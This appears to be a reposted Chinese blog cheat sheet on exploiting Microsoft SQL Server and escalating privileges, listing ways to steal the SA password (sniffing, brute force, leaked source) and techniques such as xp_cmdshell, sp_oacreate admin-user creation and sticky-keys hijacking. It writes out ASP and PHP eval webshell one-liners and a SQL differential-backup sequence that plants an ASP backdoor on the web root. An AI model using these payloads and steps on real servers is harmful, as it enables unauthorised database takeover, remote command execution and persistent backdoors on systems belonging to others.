• MSSQL 漏洞利用与提权


    1、SA口令的获取

    webshell或源代码的获取

    源代码泄露

    嗅探(用CAIN等工具嗅探1433数据库端口)

    口令暴力破解

    2、常见SQL server 提权命令

    查看数据库的版本(select @@version;)

    查看数据库所在服务器操作系统的参数

    查看数据库启动的参数

    查看数据库启动的时间

    查看数据库服务器名和实例名

    查看用户登录信息

    查看数据库里所所有的存储工程和函数

    查看数据库里用户和进程的信息

    恢复存储过程

    开启和关闭xp_cmdshell

    xp_cmdshell执行命令

    开启和关闭sp_oacreate

    sp_oacreate删除文件

    sp_oacreate复制文件

    sp_oacreate移动文件

    sp_oacreate添加管理员用户

    开启和关闭sp_makeweblask

    wscript.shell执行命令

    shell.applocation执行命令

    开启和关闭openrowset

    沙盒执行命令

    注册表劫持粘贴键

    sp_oacreate替换粘贴键

    public提权操作

    echo一句话后门(echo  <%eval request(cmd)%> >d:wwwrootok.asp    echo  <? php @eval($_POST[cmd]);?> >cmd.php)

    在mssql 中查询password

    3、通过数据库备份获取webshell

    差异备份一句话木马

    backup database [当前数据库名] to disk = 'c: ecycler1.bak'

    create table cmd (a image);

    insert into cmd(a) values ('<%eval request("cmd")%>');

    backup database [当前数据库名] to disk = '网站绝对路径' WITH DIFFERENTIAL,FORMAT--

    LOG 备份一句话木马(......)

  • 相关阅读:
    华为上机:IP地址转换
    华为上机:统计给定的两个数之间的素数的个数
    华为上机:五子棋
    华为上机:树的遍历
    华为上机:Tom的生日礼物
    华为上机:求2的N次幂的值
    2016搜狗:矩阵元素相乘
    欢迎使用CSDN-markdown编辑器
    lintcode:最大间隔
    lintcode:删除链表中指定元素
  • 原文地址:https://www.cnblogs.com/linuxsec/p/10012624.html
走看看 - 开发者的网上家园